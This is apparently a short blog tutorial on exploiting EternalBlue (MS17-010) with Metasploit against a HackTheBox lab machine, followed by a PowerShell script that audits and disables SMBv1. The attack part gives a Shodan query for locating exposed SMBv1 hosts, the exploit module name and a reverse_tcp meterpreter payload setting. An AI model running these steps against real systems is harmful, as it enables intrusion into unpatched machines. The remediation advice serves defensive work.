If you have heard of WannaCry or NotPetya, you have most likely heard of EternalBlue.
EternalBlue exploits the flaws in the SMBv1 protocol. Although it was patched back in 2017, it’s still at large today. Below is an example taken from Shodan.io.
This is a simple guide to show how easily an attacker can exploit this vulnerability using Metasploit. Hopefully it will highlight why you need to patch those systems ASAP. Just to note, the system that I exploited was part of HackTheBox.eu.
Msfconsole will already be installed and set up if you are running Kali or Parrot OS.
Here you can use a range of tools to identify your target and find a vulnerable system.
Metasploit exploits directory: /usr/share/metasploit-framework/modules/exploits
If you are using Shodan, you can use the following query:
port:445 "SMB Version: 1" os:Windows !product:Samba
*Remember that if you exploit machines you have found on Shodan, you will be breaking the law.
Once you have spun up Metasploit by using msfconsole, you could use the SMB Scanner to scan your target to verify the version:
Once you have your target, the next step is to use the exploit. You can find EternalBlue exploits using the ExploitDB: https://www.exploit-db.com/
For this example, we will use ms17_010_eternalblue…
You will need to set the target using set rhost [Target IP]
If successful, you will have yourself a shell…
If not, you might need to set the payload like so: set payload windows/x64/meterpreter/reverse_tcp
And that’s it. Pretty simple, right?
If you are viewing this and you have vulnerable systems of your own, please do patch or remediate the threat in other ways.
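One way to handle the "remediate in other ways" part on your own Windows hosts is to find out whether the SMBv1 server is still enabled, see which clients still depend on it, and then switch it off. The script below is an added example, not part of the original post; it assumes an elevated PowerShell session on Windows 10 / Server 2016 or later, and the function name Invoke-Smb1Remediation is made up for this example.

```powershell
# Added example: audit and disable the SMBv1 server on a Windows host.
# Assumes an elevated session on Windows 10 / Server 2016 or later.
# Invoke-Smb1Remediation is a hypothetical name chosen for this example.
function Invoke-Smb1Remediation {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Only switch on SMBv1 access auditing; do not disable anything yet.
        [switch]$AuditOnly
    )

    # Report the current SMB server settings that matter here.
    $cfg = Get-SmbServerConfiguration
    Write-Output ("SMBv1 server enabled : {0}" -f $cfg.EnableSMB1Protocol)
    Write-Output ("SMBv1 access auditing: {0}" -f $cfg.AuditSmb1Access)

    if ($AuditOnly) {
        if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Enable SMBv1 access auditing')) {
            Set-SmbServerConfiguration -AuditSmb1Access $true -Force
        }
        # Clients that still connect over SMBv1 are logged as event 3000.
        Get-WinEvent -LogName 'Microsoft-Windows-SMBServer/Audit' -MaxEvents 50 -ErrorAction SilentlyContinue |
            Where-Object Id -eq 3000 |
            Select-Object TimeCreated, Message
        return
    }

    # Turn off the SMBv1 server protocol if it is still on.
    if ($cfg.EnableSMB1Protocol -and
        $PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Disable SMBv1 server protocol')) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }

    # Remove the SMB1Protocol optional feature where it is present and enabled.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    if ($feature -and $feature.State -eq 'Enabled' -and
        $PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Remove SMB1Protocol optional feature')) {
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
        Write-Output 'SMB1Protocol feature disabled; reboot to complete the removal.'
    }
}

# Dry run: shows what would change without changing it.
Invoke-Smb1Remediation -WhatIf
```

Run it with -AuditOnly first to see who still talks SMBv1, then without -WhatIf once nothing depends on it. Disabling SMBv1 reduces exposure but does not replace installing the MS17-010 update.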